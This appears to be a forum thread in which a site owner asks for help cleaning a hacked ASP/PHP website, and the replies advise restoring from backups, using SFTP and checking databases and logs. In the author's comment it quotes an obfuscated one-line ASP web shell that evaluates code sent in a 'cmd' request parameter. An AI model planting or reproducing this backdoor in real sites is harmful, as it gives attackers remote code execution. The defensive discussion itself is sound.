Cleaning up a hacked website

Posted on 2015-01-15
Last Modified: 2015-01-22
I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Question by:Terry Woods
LVL 12

Assisted Solution

Sommerblink earned 100 total points
ID: 40552054
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
LVL 34

Assisted Solution

by:Paul MacDonald
Paul MacDonald earned 100 total points
ID: 40552065
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
LVL 34

Accepted Solution

gr8gonzo earned 125 total points
ID: 40552171
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
Complete VMware vSphere® ESX(i) & Hyper-V Backup

Capture your entire system, including the host, with patented disk imaging integrated with VMware VADP / Microsoft VSS and RCT. RTOs is as low as 15 seconds with Acronis Active Restore™. You can enjoy unlimited P2V/V2V migrations from any source (even from a different hypervisor)

LVL 33

Assisted Solution

by:Big Monty
Big Monty earned 125 total points
ID: 40552204
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
LVL 35

Author Comment

by:Terry Woods
ID: 40552236
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
LVL 33

Expert Comment

by:Big Monty
ID: 40552262
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
LVL 52

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 50 total points
ID: 40558397
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
LVL 35

Author Closing Comment

by:Terry Woods
ID: 40563794
Thanks all for your help!

Featured Post

Announcing the Most Valuable Experts of 2016

MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

The new Gmail Phishing Scam going around is surprising even the savviest of users with its sophisticated techniques. This attack comes as a nightmare trifecta for email filtering services; sent from a familiar contact, using authentic tone and verbi…
Ensuring effective and secure communication in the age of healthcare BYOD.
Sending a Secure fax is easy with eFax Corporate ( First, Just open a new email message.  In the To field, type your recipient's fax number You can even send a secure international fax — just include t…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

808 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question